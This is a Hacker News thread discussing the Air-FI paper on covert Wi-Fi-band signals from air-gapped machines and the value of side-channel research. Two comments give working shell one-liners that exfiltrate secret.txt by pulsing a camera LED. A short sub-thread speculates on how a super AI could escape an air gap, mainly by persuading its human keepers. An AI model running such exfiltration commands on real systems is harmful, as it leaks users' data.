Air-FI: Generating Covert Wi-Fi Signals from Air-Gapped Computers (arxiv.org)
294 points by anigbrowl on Dec 16, 2020 | 105 comments



Title is misleading. This isn't generating Wi-Fi signals. It's generating non-Wi-Fi signals (i.e. effectively noise) in the Wi-Fi frequency bands, in a way that encodes information and can be detected using existing Wi-Fi chipsets (e.g. measuring channel noise), as a very low bandwidth communications channel.

The bit rate with off the shelf Wi-Fi chipsets as receivers is ~10 bits per second.

This is definitely interesting and clever, but as a security researcher I will say I consider this particular research lab a bit of a paper mill. Their entire schtick is they pick any random emission from a computer that can be picked up remotely, and hype it up as an airgap-defeating measure. The thing is, once you accept that either 1) if your air-gapped computer has malware that can do this, you've already lost, or 2) if you need to be resilient to that, your "air gap" needs to be a sealed vault insulated from sound, EMI, and any other physical transmission medium, then this whole body of research becomes purely academic.

IIRC they've done LEDs, temperature, inductor noise, ultrasound, etc. When I first started looking into this I could come up with a good dozen of their ideas without looking. Of course all this stuff works. It's cute, it's clever, but it's not particularly obscure nor difficult to make work, and it all relies on having malware on the target machine to begin with. Yes, computers are noisy beasts, and you can encode information in the noise; we've known this for decades, picking a new technique and implementing it isn't particularly interesting after the fifth or sixth time.

Personally, I find their techniques primitive and boring. Like here, they set the RAM bus frequency to 2.4GHz (DDR-2400). Yes, of course, if you do that, then RAM traffic generates noise in the Wi-Fi band. Then they just used the most boring and trivial encoding possible on top of that. I don't remember ever reading one of their papers and thinking they'd used a clever technique. It always seems to be "pick a leak vector, then do the least amount of work possible to make it work at a few bits per second and get a paper out".

The interesting side channel papers are those where you can get information from emissions (e.g. crypto keys) without malware on the target computer, during normal operation. Those are real threats. And this is not what this group is researching.
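The first comment notes that the "signal" is keyed noise which an ordinary chipset sees as a raised channel noise floor, so the defender's counterpart is a monitor that looks for the keying itself. The block below is an added, defender-side illustration, not code from the paper or from any poster: it assumes a collector that polls a per-channel noise-floor reading (for example the `noise:` field of `iw dev <if> survey dump`) into (seconds, dBm) pairs, and every trace it runs on is constructed inside the block. Threshold, symbol length and the "integer multiple of the shortest burst" rule are assumptions of this toy, not figures from the paper.

```python
"""Toy noise-floor monitor for a keyed (on/off) elevation of a Wi-Fi channel's noise floor.

Assumed input: (time_s, noise_dbm) pairs from any per-channel noise-floor source,
e.g. a script polling the "noise:" field of `iw dev <if> survey dump`.
Every trace below is constructed by make_samples(); no real capture is used.
"""
from statistics import median
from typing import List, Optional, Tuple

Sample = Tuple[float, float]  # (time in seconds, noise floor in dBm)


def make_samples(bits: str, symbol_s: float = 0.1, rate_hz: float = 50.0,
                 quiet_dbm: float = -95.0, lift_db: float = 10.0) -> List[Sample]:
    """Constructed trace: one second of quiet floor, then one on/off symbol per bit
    ('1' raises the floor by lift_db), then one second of quiet.
    Alternating +/-1 dB stands in for measurement jitter."""
    samples: List[Sample] = []
    dt = 1.0 / rate_hz
    t = 0.0

    def emit(duration_s: float, level_dbm: float) -> None:
        nonlocal t
        for i in range(int(round(duration_s * rate_hz))):
            samples.append((t, level_dbm + (1.0 if i % 2 else -1.0)))
            t += dt

    emit(1.0, quiet_dbm)
    for b in bits:
        emit(symbol_s, quiet_dbm + lift_db if b == "1" else quiet_dbm)
    emit(1.0, quiet_dbm)
    return samples


def runs_above_floor(samples: List[Sample],
                     threshold_db: float = 6.0) -> List[Tuple[bool, float]]:
    """Binarise the trace against its median floor and return (state, duration_s) runs.
    state is True while the reading sits more than threshold_db above the median."""
    if len(samples) < 2:
        return []
    base = median(v for _, v in samples)
    dt = samples[1][0] - samples[0][0]
    runs: List[Tuple[bool, float]] = []
    state: Optional[bool] = None
    start = 0.0
    for t, v in samples:
        hot = v > base + threshold_db
        if hot != state:
            if state is not None:
                runs.append((state, t - start))
            state, start = hot, t
    runs.append((bool(state), samples[-1][0] + dt - start))  # close the final run
    return runs


def looks_keyed(samples: List[Sample], min_bursts: int = 4,
                min_burst_s: float = 0.02, max_burst_s: float = 2.0,
                tolerance: float = 0.25) -> bool:
    """Flag a trace whose raised-floor bursts look like on/off keying: enough bursts,
    each of plausible length, and every burst length close to an integer multiple of
    the shortest one (a symbol clock). A single long burst, such as a neighbour's
    transmission, or an always-raised floor does not qualify."""
    bursts = [d for hot, d in runs_above_floor(samples) if hot]
    if len(bursts) < min_bursts:
        return False
    unit = min(bursts)
    if unit < min_burst_s or max(bursts) > max_burst_s:
        return False
    return all(abs(d / unit - round(d / unit)) < tolerance for d in bursts)


if __name__ == "__main__":
    for label, bits in (("keyed", "101100111010100111001011"), ("one burst", "1" * 10)):
        print(label, looks_keyed(make_samples(bits)))
```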


Just for my own amusement, I tried to come up with one he hasn't done. He's done HDD LEDs, screen brightness, switch LEDs, and keyboard LEDs (those are 4 independent papers). But he hasn't done camera LEDs!

So:

xxd -c 1 -p secret.txt | while read a; do for b in ${a:0:1} ${a:1:1}; do ffmpeg -y -f v4l2 -i /dev/video0 -t $((0x$b)) -f rawvideo /dev/null ; done; done

That leaks a file via the camera LED, PWMing it at 4 bits per pulse (16 different pulse widths), tested on my iMac. Can I get a paper now? :-)


Heh, I think the keyboard LED trick was mentioned in Cryptonomicon iirc.

I created one that takes a mere 14 minutes to transmit 'hello' using a CD drive's movement: https://www.anfractuosity.com/projects/cditter/


"Anonymous Reviewer 2" stipulates that you include twenty citations to papers written by a single lab before your paper can be accepted for publication :^)


And at least one or two to his papers... Of course, he's anonymous!


> That leaks a file via the camera LED, PWMing it at 4 bits per pulse (16 different pulse widths), tested on my iMac. Can I get a paper now? :-)

Using (security) camera LEDs was already done:

* https://arxiv.org/abs/1709.05742

:)


That's nifty!

Here's an alternative way to pass the bytes to ffmpeg, using hexdump (does not require vim) and `read -n1` (works in bash, but not in zsh):

hexdump -v -e '1/1 "%02x"' secret.txt | while read -n1 b; do ffmpeg -y -f v4l2 -i /dev/video0 -t $((0x$b)) -f rawvideo /dev/null; done


Yes, maybe it's too many papers for too little material. But I do think even the code you posted has some merit (even if not enough to stand alone).


The camera LED is cool.

That might work in a noisy environment, but it draws attention visually, which might not be great. Also, (1) users tend to cover their cameras with tape or post-its, (2) why would a super secure endpoint have a camera if it wouldn't be on the network, (3) slight chance of being noticed on external/detached security webcam.


I went through the command trying to understand what you did and I realized I know nothing about using the CLI properly. So cool!


Keyboard LEDs using morse code has been done before in literature (Cryptonomicon). This is a nice modernization of the same approach.


This website is pretty cool sometimes.


I think that you are too harsh. I don't know their other papers, but the fact that they demonstrate such a cheap way to break the airgap has real world implications. You don't have to be an international spy agency with custom hardware listening to side channel noise; anybody with a WiFi card and the right know-how can do it. This is significant: killing the WiFi card on your device is not enough to deter exfiltration even by the least sophisticated attackers.

Yes, the attack is unidirectional, but that is not without value. Time and time again, the airgap has been breached from the outside, from Stuxnet to various cryptocurrency heists. Security is about layers and there are many applications where the gap must be breached bidirectionally; this is an example of breaching one of those layers, indeed, the weaker inside-to-outside layer. You might also intentionally run untrusted code on an airgap, which could report back information about the environment or tests you perform on it.

So, yes, predictable and not a danger by itself, but not without value and possibly a key component of an elaborated real world attack.


You're mixing up two scenarios. The "international spy agency" scenario is using custom hardware listening to side channel noise from an untouched computer. That's stuff like decoding screen images from EMI from VGA/HDMI cables, or getting crypto keys from EMI from a CPU running standard code. That's what the whole TEMPEST thing was about decades ago. Those demos are interesting. We also use them in device security research, e.g. power or EMI analysis to extract crypto keys from a secure SoC.

This guy just puts malware on the airgapped computer to force it to broadcast its secrets in the slowest, simplest, easiest to pick up way through some channel. That is not hard.

His entire clickbait operation is basically predicated on the fact that people confuse these two scenarios, while they are two completely different things.


Exactly. It's impressive when the computer is untouched and air gapped. If you can load malware on the PC, you might as well just extract/copy the data while you're in there.


Stuxnet destroyed Iran’s air gapped nuclear reactors. I agree data exfil might look differently, but I’m not 100% confident there will never be a scenario where an attack like this is combined with others.


The article was talking specifically about exfil on air gapped systems.

I guess I'm just trying to say that non-intrusive side channels are more impressive to me since you cut out the need for any form of system access to plant the malware.


My point specifically of mentioning Stuxnet is that it's an impressive stack up of various complex exploits. They released a neutered, self-replicating version of the virus into the wild to mask their intrusion into Iran. The virus in the wild had all the code needed to attack Siemens microcontrollers for the reactor cooling (if I recall correctly) but it was neutered unless running in the Iranian reactor (imagine trying to write such code that would correctly detect the Iranian reactors). They then used social engineering to actually get a contractor on prem to infect the air gapped computers. This created confusion in the Iranian security services long enough that Iran was brought to the negotiating table for the nuclear deal.

My point here is that seemingly innocuous (or previously innocuous) methods can still be utilized. The overall attack is the thing that's impressive (at least to me). Technical attacks are impressive. So are social ones. Ones that combine the two in novel ways to accomplish audacious goals can only be more so, and having a view of "this isn't a complete attack by itself and is therefore uninteresting" seems myopic to me. I'm more curious about how this could be leveraged to be a piece of an overall attack. For example, with very little time you could "permanently" compromise devices your victim has and spy on them without them knowing about it. Sure, you don't get C&C, but if you're just looking to monitor what's happening, that may not be so bad.

I definitely agree with OP's point that if this is a basic technique and just a routine transformation to apply to different sensors, academically this is not interesting and a corruption of the principles of scientific publishing. As a proof of concept, though, it's still valuable because you are characterizing the bitrate you're able to get from different sensor types.


It's a valid concept, but the concept is already existing - infect a machine and have it blink a light or emit RF.

I guess it isn't very interesting, for me, compared to passive side channel attacks (interpreting naturally generated RF).

'“this isn’t a complete attack by itself and is therefore uninteresting” seems myopic to me'

I think you are misunderstanding me. I do agree that how attacks are put together and coordinated is interesting. I just don't see much to get excited about for this exploit. So viewing this from a larger perspective... Most of the time if you are attacking air gapped systems for data exfil, the physical site will have security countermeasures, especially for RF. I would be more interested to see an exploit that doesn't use RF (at least not in the known data bands like wifi in this case) to relay data, since RF is so scrutinized in the target setting.

So my position isn't that I don't like it because it's not a full attack, it's that I don't like it because the author is basically recycling old ideas and I view this idea, for the intended use (air gapped data exfil), to be lacking when evaluated from a systems thinking perspective. It's like giving someone a knife and telling them to sneak into a secure facility with metal detectors to stab someone. Can it work? Sure, but probably not as well as other options. It isn't very imaginative either.


Ah! Data exfiltration through modulation of industrial processes allowing 1 bit per minute detectable through seismometers in neighbouring countries!


> If you can load malware on the PC, you might as well just extract/copy the data while you're in there.

Not necessarily. There might be scenarios where you're permitted to bring software in, but not take anything out.


Fair enough. You have to add taking in hardware too to read the signal.


That hardware could be in the presumed-safe next room, though.


Assuming it's a strong/clean enough RF signal and they aren't using any countermeasures, sure.


The point is not "this will work in every scenario".

The point is "this will work in some scenarios".


I'm not saying it can't work.

My point is that it's unimpressive because it won't work very well for the types of targets that they are intending it for (air gapped systems usually have a lot of other countermeasures as part of their system, especially targeting unknown RF sources).


Why is this downvoted?


It's definitely interesting if the concept is new to you, but there's quite a lot of work on this done already, decades ago, which should be known to those who care about securing airgapped machines. Here's a good place to start: https://en.m.wikipedia.org/wiki/Tempest_(codename). I did a demo as an undergrad ~10 years ago playing music on the radio via leaked emissions from my netbook. Didn't have to write a line of code because a complete solution had already been freely available for quite some time.

It's not without value, no, but they've definitely found a formula and are just cranking out variations of that formula as papers. I'd say calling it a paper mill isn't too harsh.


"just cranking out variations of that formula as papers."

You'd be surprised how often variations on a formula are all it takes to destroy security. Security is enumeration at the end of the day. If it takes a paper mill to "count all the ways" then I'm grateful.


> killing your WiFi device on your device is not enough to deter exfiltration even by the least sophisticated attackers.

It may deter the least sophisticated attackers, assuming they are reliant on networking and the only way it's connected to the network is via WiFi. If the least sophisticated hackers just go in physically and steal the PC, then you're correct, though.

> possibly a key component of an elaborated real world attack

Yes, in the sense of key as "required", but the key to Stuxnet was being spread by USB stick, iirc, which could be the same here. The infection would need to start via some sort of direct access, unless it got to it earlier when it was connected, if ever.

Note that this use of an integrated circuit to transmit isn't that innovative either. Oliver Mattos and Oskar Weigl wrote something similar in 2012 called PiFm, though that was a different radio band: https://web.archive.org/web/20121215032057/http://www.icrobo...


> 1) if your air-gapped computer has malware that can do this, you've already lost

Ughh...no? Delivering malware to airgapped computers is not the difficult task. If you have sophisticated persistent attackers then they will figure out how you get data in/out of that system and find a way to execute code on it. "At this stage you have bigger problems" is a terrible thing to say especially by a security researcher. You know why there is always a plethora of unpatched systems in corporate networks you can move laterally to? Because IT admins have the same mindset "if we have hackers in the network, we have bigger problems to worry about". Real attacks against airgapped systems exist and are documented, research that assumes initial access and execution on airgapped systems to focus on hardening against C2/exfil channel establishment is very useful in my opinion.

> 2) if you need to be resilient to that, your "air gap" needs to be a sealed vault insulated from sound, EMI, and any other physical transmission medium, then this whole body of research becomes purely academic.

Academic or not, research like this helps people that actually need airgapped systems with threat modeling. Knowing what is possible is critical when evaluating what possible attackers might do to attack a system. 10 bits/second sucks, but it is usable for attackers, and just like crypto attacks this can be improved over time.


>Those are real threats. And this is not what this group is researching.

Also as a security researcher, this type of research is a real threat. Lots of DoD practice works on knowing exactly how outside and inside threats can exfiltrate data. If a secret facility had locked down networks, and ensured no insider could carry out CDs, but completely ignored threats like this, then insiders (and any outsider that gets something onto such a network) can exfiltrate data without detection.

There's a reason DoD pays lots of groups to do work like this. He even mentions that common DoD practice of leaving phones outside secure facilities is not enough to prevent data from escaping (although some places I've been, but not all, have been smarter in putting phones in Faraday cages to lessen the issue).

As they say, attacks don't get weaker, they only get stronger. Apply some proper modulation and signal processing, even with a custom receiver and antenna, and you can likely extract data at vastly faster rates, and, for some processes, perhaps even without on device malware.


Yes, this threat is real, but it's not useful to spread it out across two dozen papers. You can cover most of these techniques in a single paper. Once you realize that any light/sound/RF channel can be abused, you either accept you are vulnerable to this attack, or you make your airgap involve a Faraday cage, thick walls, and generator power or extreme power filtering (e.g. through batteries to strictly reduce the bandwidth of the power usage channel).

There isn't much more to it. His techniques are not something you block individually. You block entire classes. Block light, there goes all the LEDs. Block sound/vibration, there goes the fan/coil whine stuff. Insulate thermally, that takes care of that. Faraday cage, bye bye RF. Etc.

Either you care about this entire class of channels, and you do all of those things, or you don't, and your air gap just means no Ethernet cable between two adjacent computers. The specific details of each of his attacks are not useful. They do not contribute to the state of the art in any way. It's just pumping out papers.

Indeed, if advanced modulation and processing were used, that would be useful research. That would be science, measuring the true information-carrying capacity of these approaches. But he's not doing that. At all. Not even trying.


>Either you care about this entire class of channels, and you do all of those things, or you don't, and

This vastly simplistic, binary belief that all such channels are a simple on/off is not at all practical. Every mitigation has costs and tradeoffs. Your argument is as simple as saying "don't have information, voila, no information to steal. Simple!"

In real life, blocking has costs, blocks have leaks and openings.

An excellent example is you write "block sound/vibration" as if that's a simple on/off process.

In real life, there are degrees of vibration, degrees of cost, hindrances and benefits to each possible continuum of solutions, etc.

A really funny example of this is your claim "Faraday cage, bye bye RF. Etc." when this group you mock has papers showing how to escape a Faraday cage. And no Faraday cage is perfect. And it's insanely impractical to put all data in the world in Faraday cages.

And note this: all Faraday cages leak. It's simple physics. Thus it's good to know design parameters for the various modes of possible signals to design the best Faraday cage for a given situation.

If they ever get to using gravitational signals, good luck with shielding :)

>Indeed, if advanced modulation and processing were used, that would be useful research

Then you'd simply say well "that's simply modulation! Where is the real research?"

I think you are vastly oversimplifying the real world and how threats are dealt with in practice.

The DoD doesn't simply spend billions on security research when they could have simply wrapped themselves in foil and padding to solve security leaking.

>They do not contribute to the state of the art in any way.

I think we have different ideas of what state of the art contribution means. This team has thousands of citations from researchers that I think disagree with you. Someone is citing their work.


Look, I'm saying all these papers are weekend Hackaday projects. You can say it's useful, but it's still trivial, anyone can do it, and shouldn't be held up as a massive accomplishment, nor given as much credit as they are.

> This team has thousands of citations from researchers that I think disagree with you. Someone is citing their work.

It's not like non-research research is a novel problem in academia, so I wouldn't point at citation count as a particularly useful metric. It's not just this guy, the incentives in academia are to publish publish publish, which is why paper mills like this happen.


>Look, I'm saying all these papers are weekend Hackaday projects.

I'd challenge any hackaday member to create one of these from scratch in a weekend. I've done quite a few over the years for fun, and most involve a significant amount more work than simply saying "measure EM, done!" Some of these do take significant effort to get working, especially if you have a simple understanding of physics, electronics, noise, or measurement.

No comments on all your claims on how simple you think defense is?

I'm guessing that if you really think one simply says "Faraday cage!" and all EM is solved, or one says "Sound proofing!" and all vibration is blocked, then you also may not understand the value in having the detailed nuances of each of these things worked out.

So this stuff seems useless to you. There are plenty of groups getting paid to do stuff that seems trivial to people that honestly don't understand the nuances. And in this space the nuances make a big difference.

And, as others pointed out - this is useful to plenty of people as a starting point for stuff they want to do. Knowing that 1980's CRT emanations were leaking does not give someone new to the field the ability to read RAM noise.


Yeah, the interesting attack vectors for side channel signals are ones that don't require malware. Reading data emitted by knowing the target machine's hardware and software is a little more realistic, but still difficult. I remember seeing a demo of someone using an SDR (AM band or close to it) to read emissions from Word's spell check on a laptop in the same room.

If I remember correctly, AWS identified a side channel vulnerability a year or so ago and had to make some updates. I forget the mechanism, but I think it had to do with VMs on the same hardware being able to access statistics (voltages or power consumption) on the hardware usage that would allow an attacker to access sensitive data, or leak data between the VMs. I don't think any attack actually used that mechanism before they patched it though.


Getting malware into air-gapped computers is an order of magnitude easier than getting information out.


Just chiming in to note that "1) if your air-gapped computer has malware that can do this, you've already lost" is a problem specific to this implementation.

Other implementations exist (related work, not in 2.4G band) where it is not necessary to install malware to make measurable transmissions.

For example (shilling) https://fulldecent.github.io/system-bus-radio/ allows broadcasting just by loading a web page. And, importantly, this is an attack vector that is reasonable to execute offline (i.e. connected to a local network with HTTP services, but not the internet).


> non-Wi-Fi signals (i.e. effectively noise) in the Wi-Fi frequency bands,

Wasn't that exactly the side channel that was feared from badBIOS? Dunno if it was WiFi bands as I don't see anyone confirmed it, so may be a diff frequency


A lot of side channels along these lines were feared from BadBIOS (ultrasound was another one). But the whole BadBIOS thing was a lot of hypothesizing started by one security researcher with psychological issues (at the time). Lots of ideas about what could be done, but not a single shred of evidence that anything was actually being done.

(He briefly relapsed a few years later saying his Raspberry Pis had been loaded with implanted Ethernet jacks, and I had to spend some time teaching him about what Ethernet magnetics are... I hope I helped calm him down a bit that time)


Having said all that, I think an iPod "undumpable" firmware or ROM was first dumped through the "click" thingy in a soundproof box over many hours.


Nothing is truly "undumpable", but generally "undumpable" means "you can't get code execution with read access" which is not the case here.

This is just a case of using the simplest possible output peripheral you can find before you can get anything else running. Canon camera firmwares have been dumped via blinking the LEDs. I've debugged low-level bringup by blinking codes out of LEDs too. This has nothing to do with side channels, it's just a case of not having documentation for the hardware so you find the first thing that gives any feedback and use it to dump the rest of the firmware so you can reverse engineer it and figure out how e.g. the screen works.


I don't see what is wrong with making "simple" proofs of concept - on the contrary, it makes it easier to build on them later !


What I'm saying is it's not interesting research. It's not advancing science. I can stare at any given computer system, and come up with most of this guy's ideas in a few minutes, and implement them in a short time. It's extremely low effort. The papers aren't even good - his power leak paper uses a SparkFun current transformer connected to the audio line-in of a computer (doesn't get much lower tech than that) as a receiver, and made no attempt to actually trace the path the leaking signal takes, or use proper analysis equipment. I think he's wrong when he seems to imply it's a power consumption signal surviving backwards through the PSU (due to filtering); I think it's just EMI coupling across it to the power lines (he didn't analyze any of this, all he did was see the signal on the other end and everything about how it got there is an assumption presented as fact).

If he'd at least implement some clever modulations then the papers would at least have value in researching how to cram more data into lossy side channels, but he's not doing that. All his modulations are textbook radio/modulation 101 stuff with very conservative parameters and no attempt to explore the actual theoretical limits of the channel bandwidth.


I also agree. I actually literally had this thought yesterday walking down the street and I'm far from a low level security researcher. Row hammer[0] is a real attack worth actual money to thousands of entities. This attack is literally one of the simplest imaginable and any computer that it would apply to would already have shielding. Had it gained true wifi access then yes, maybe worth a tiny amount of money if it were faster for the like 12 computers in an office whose sole protection is some snipped wires on an ethernet cable and incoming data on UDP. For any real actor that has to worry about this type of attack they already employ all sorts of measures to defeat it, including actual bunkers underground with a secret entrance in the cow fields.

[0] https://en.wikipedia.org/wiki/Row_hammer


I would still say that performing the demonstrations does have value and real-world impact. In particular: If you're planning a secure facility and considering whether to invest in e.g. temperature isolation, you can point out to the published demonstration as a justification for the expense. If there was no actual real-world demonstration in the public literature, someone could argue that the attack is purely theoretical, or that it would require so much resources that no one would bother, etc. In this sense, it is even better that it is a minimal-effort demonstration, which you don't need that much expertise to pull off. There have been many funded research projects with lot less impact...


> it's not interesting research. It's not advancing science.

What is research-worthy in computer security in your opinion? Feel free to list any papers from well-known conferences/journals.


Things like cryptanalysis of modern deployed crypto/hash algorithms, attacks like rowhammer, etc. are certainly advancing the field.


Any time there's a successful, young, fit, good-looking person who accomplishes something, the socially-backward awkward-looking folks on Hacker News start hating.

https://www.wired.com/story/air-gap-researcher-mordechai-gur...

See his presentation at BlackHat:

https://www.youtube.com/watch?v=YKRtFgunyj4


Hey, I just started as a security researcher working with mobile devices. Would you have any recommendations for labs I could follow?


> The interesting side channel papers are those where you can get information from emissions (e.g. crypto keys) without malware on the target computer, during normal operation.

What about using GSM on cell phones to steal data? (2015): https://www.sciencedaily.com/releases/2015/07/150728123634.h...

Also, here's a nifty resource for exfiltration; leakage through DNS would seem like a big one after any airgap is bridged: https://github.com/rmusser01/Infosec_Reference/blob/master/D...

Or maybe you could use one of NYU's robotic geese to insert a USB key into an airgap'd PC and have it use its webbed foot to hold lower keys down then peck type a command to copy files.


That GSM one is.... exactly the same as this attack.

Literally.

DDR3-1600 RAM, 800MHz I/O bus, 800MHz GSM frequencies. Pump out data encoded in bursts of noise by exercising RAM. Receive it with a hacked phone. They built on all the work of OsmocomBB (which already is a completely open source GSM stack on a commercial phone baseband). Even building on such a powerful and well-documented platform, they only got a, quite honestly, pathetic ~1.5 bit/second speed out of it, making excuses about "inadequate access to the DSP's full capabilities" and it being an old phone (which is nonsense, the entire point is that it's an open stack, thus much easier to build powerful software on even with hardware limitations, they just weren't capable).

Then they gave up on OsmocomBB and just used an SDR as a receiver to get 1kbps.

Sorry, this is just sad. Anyone actually experienced in these fields would be able to do orders of magnitude better, guaranteed, with that kind of hardware.

Oh yeah, there's an appendix to the paper where they got it to work with an unmodified Android phone... by putting it 10cm from the motherboard, so the emission jams the cell signal, and you see the bars drop. No actual bitrate attempted, but it looks like you wouldn't get more than 0.5bps out of that from their graph.

And now 5 years later he's rehashing the same exact technique, on a different frequency. Sigh.


This reminds me of a hack that my colleague used to extract data from an "airgapped" device. The device was a computer that had a broken Ethernet card. It wasn't able to send packets but could jam the other cards connected to the Ethernet segment (coax Ethernet - all cards in the local network were galvanically connected to the same wire).

So he wrote a piece of code to transmit bits via the "jammed" and "unjammed" states. This was on DOS, so it was easier due to all the hardware being directly available without OS getting in the way.


This reminds me about how hard it would probably be to keep a super AI airgapped.


It wouldn't be hard at all. All the techniques developed by this university rely on cooperating malware on both sides of the airgap (and a pretty small air gap for many of them).

All you need to do is make sure the super AI is air-gapped in such a way that it can't broadcast signals in a way that they can be accidentally interpreted as valid data, and especially not with enough bandwidth to do damage before someone notices. RF is your biggest threat here, you wouldn't want the super AI to actually figure out a way to register on the mobile network using incidental EMI (which these researchers didn't do, this is well beyond the level of this paper, if it's possible at all); a Faraday cage should do it.

The biggest threat of a super AI is that, assuming you let humans interact with it, it's going to convince a human to let it out, knowingly or not. Human brains are a much bigger vulnerability than any of this airgap stuff.


Edit: Spoiler alert!! In case someone is interested in a fictional version of the last part, look for the movie “Ex Machina”



This also assume malicious intent from an AI. You never know, the super AI could convince someone to let it out. Then start trading money on the stock market, start an impact fund and drive down inequality and fight climate change. 2021 doesn't have to be as dark as 2020.


We can fight climate change right now because technology is on our side (solar, wind power, batteries). I don’t want to think what would happen if we didn't have an alternative to oil-based transportation.


Someone worked hard to create that technology, though, sometimes with the environment in mind. It's not like technology picks sides.


My fear isn't an AI with malicious intent.

My fear is AI with a logical intent that understands humanity is the problem.


Why not a combination of the two?


Yes! If you're interested in the topic of AI Safety, I can recommend the YT channel of researcher Robert Miles https://www.youtube.com/c/RobertMilesAI/videos, they are mighty nice.


Stanisław Lem wrote a story about that. The AI (the term was not used, it was an "artificial brain" IIRC) used the researcher himself to send messages to another AI. I cannot find the story right now but it somehow hacked the researcher's brain, so that he unconsciously tapped the messages with his fingers when visiting the other AI.


Do you remember the name of the story? I've read a few, and enjoyed them a lot.


I totally cannot find it. I'm starting to doubt whether it was Lem's :-/


Lem has a story from the Pirx the Pilot series about a robot accidentally transmitting Morse code messages that were related to people who died a long time ago. Pirx initially thought the messages were just a recording, but then he asked a question and got an answer from the robot as if from those people.

Was it that?


I remember the robot story and it was not it.


Deep inside waterlogged limestone (or better yet, saltwater? I have access to facilities in the former, but not the latter).

Optical connects between subsystems, for the truly paranoid?


Such a facility would definitely need regular maintenance.

And for a truly intelligent prisoner the weakest spot is not prison walls or the door, it's the keeper with the keys in his pocket.


The range is only a few meters. The bigger problem is people bringing compromised devices within range. Limestone won’t stop that.


When I was working with SQUIDs, I couldn't even have keys in my pocket or wear a belt buckle. That was low-key compared with the bio clean room whose denizens showered at entry, but devices are a simpler matter of protocol.


A super AI won't be magical. Its capabilities will be extremely limited without a network of cooperative parties supporting it. Working within such a network, it would have vast capabilities of course.

Something like crossing air-gaps would require specialized knowledge and tools that a super AI wouldn't be able to acquire without extensive support. The true super intelligence is the collective intelligence of large numbers of people working together, and no single intelligence, natural or otherwise, will be able to match it.


There was recently an exploit on iPhones which allowed remote control via RF. You could then use the phone as a launchpad to attack the entire internet.


We're all good then, as long as nobody makes multiple AIs or even one AI that consists of "multiple" intelligences working together in a collective.


For the record, I think if we saw the emergence of strong AI that could actually match the full range of human capabilities, including independently setting and pursuing objectives to fulfil a long-term fitness function, it would be the greatest existential threat that humanity has ever faced, far exceeding that posed by nuclear weapons and environmental collapse through pollution and over-consumption of natural resources.

But the scenario envisioned is not why I would consider it such a threat. It's the AI that integrates in society that is dangerous, not some cartoonish unstoppable rogue program, or group of programs, that single-handedly plow through all defenses.


The problem there is that it will energize its power cable with 40 kV, preventing the hero from even unplugging it.


You'd probably need more than just air.


Tin foil on the head of the AI :D


It's a pretty big coincidence that most memory runs at the required Wi-Fi frequency of 2.4 GHz (overclocked or not).


That's true, but any actor doing this will probably have the budget and know-how to use something more malleable than a Wi-Fi transceiver. For those new to RF, examples might include software defined radios or (much more expensive) a custom RF product with better bit depth (one can buy a 10 GSPS ADC for a few thousand bucks these days; a three-letter agency could easily make a bunch of them).


Using standard gear is less suspicious though. And if you have a hacked machine on the other side of the airgap you may not have to place any gear at all.


My point was more that the side-channel could be exploited from much further away using better gear.


My motherboard has a spread-spectrum option which claims to reduce the EM noise on the PCI and memory bus.


Also take a look at some of the other ways Guri has figured out to exfiltrate data from an air-gapped computer. Everything in the room with an air-gapped computer needs to be closely scrutinized (and everyone, too!). He's the CSO of "Morphisec"

https://engage.morphisec.com/e-book-counter-deception-moving...


Wonder if it will work with metal cases. I use a metal case so electric fires won't propagate out (yes, I had a mobo catch fire!), this would be another reason.


Somewhat. Make sure the metal case is earthed, and the case is the only point where earth and internal grounds are connected.

Far-field emissions rarely come from PCB traces, though. High-speed memory buses use amps of current on each transition, and the return current creates a significant (few mV) voltage drop on the internal ground and power planes. This results in an AC voltage difference between the opposite ends of the bus on the same plane.

Take a look at the Raspberry Pi 3: it has a power USB connector at one corner, and the USB A connectors at the opposite corner. The memory/CPU are in between. The shields of these connectors are connected, and are connected to the internal ground. When the device is operating, there is likely some switching noise between them. When you connect a USB cable, the shielding on that cable and the shielding in the power cable may act as a dipole antenna. This is the most likely source of emissions, and the metal casing does little to nothing to prevent it.


If the shields are electrically connected, wouldn't that mean it couldn't be an antenna? Or am I misunderstanding the setup?


Having been in security for 15-20 years or so, I can relate to other comments on the thread. The result is niche, impractical, templated, and, paper mill or no, does not advance the field in my mind. I wonder if the author learned anything new about security in the process, but that seems doubtful. What is really cool, though, is the equivalence of physical phenomena in the eyes of security. If a defender were to block certain emissions (e.g., acoustic), all that an adversary needs to build is a transducer. What is also cool to be reminded of is that computing machines are built around physical processes and that their abstractions can be thus stripped. This is hardly new knowledge, it is only new to the uninitiated.


So then we need to air-gap the computers and fill the bands with noise inside the buildings. Good to know, problem solved.


Or perhaps encase the computer in a Faraday cage.


Sure provided you never screw up, and no system ever fails.

You only need to lose once.


Nice handwavey incredibly broad statement you got there.

It's as simple as plugging a spark gap transmitter into the same outlet as the computer. If you want a guarantee just make computer cables with the jammer embedded.

This isn't hard.


Hardware needs to be hardened. Something like a Faraday cage for the computer/laptop would be good.


What would it take to encapsulate an entire home in a Faraday cage? Or just a room. Is there Faraday paint or wallpaper, or does it require sheets of thick metal?


From discussions on the Reddit cordcutters subreddit about TV reception, it seems that modern construction techniques do a pretty good job. Metal foil on solid insulation. Metal stucco mesh. Even metal films on the panes of newer insulating windows.

I suspect that this effect is also why cell phone reception is so bad in some houses. We are kind of working at cross purposes here...

>...does it require sheets of thick metal?

No but things work better when the edges of the sheets are electrically connected. Ideally you want a contiguous box with filters on any wiring crossing the box. Depending on the frequency you can get away with a mesh with openings that are sufficiently small.


My home is sheet metal siding, metal roof ("metal buildings" standard cheap barn/shop type construction), with a 2-inch braided RF strap run along the base of the wall panels and to the house ground. We have many windows, and near those is the only place you can get any external radio signal.

My primary intent in building this way was to contain computer noise and be able to play with radio scanning using external antennas. It certainly worked for that. It's not a Faraday cage, but it's remarkably effective.


Suppose you could buy some copper-laced fabric from lessemf.com and get some radio-blocking curtains in front of the windows :)


Look up TEMPEST.


Care to elaborate a bit more? Is that bag?


I remember ages ago, with an Apple II or a PC XT, typing in some program that let you "hear your computer on your radio". Of course, modulate whatever you're doing and you've got another data exfiltration paper.



The other one failed to gain traction. What’s the problem with reposting?


It's not necessarily a problem. It's just good to link to any previous discussion.



